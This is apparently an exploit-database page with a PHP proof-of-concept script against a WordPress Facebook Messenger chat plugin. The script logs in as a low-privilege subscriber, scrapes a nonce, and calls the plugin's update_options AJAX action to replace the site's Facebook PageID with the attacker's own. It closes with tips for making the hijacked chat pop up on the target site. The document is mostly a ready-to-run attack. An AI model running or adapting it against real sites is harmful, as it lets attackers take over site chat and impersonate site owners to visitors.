Share
## https://sploitus.com/exploit?id=WPEX-ID:10343
Obtain PageID from a test Facebook Page (found under page - about - pageID). 

Use this script:

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$pageID = $argv[4];

// 1) Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log' => $wp_user,
    'pwd' => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/ajax_object\s=\s{"nonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'update_options',
    'pageID' => $pageID,
    'locale' => 'eng',
    '_wpnonce' => $nonce
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

Verify the PageID updated in the DB and verify that a chat initiates with your added page.

***If you are having issues getting messenger to pop-up on target site, add the domain to your Facebook page's Whitelisted Domains. This can be found by going to the Page > Settings > Advanced Messaging.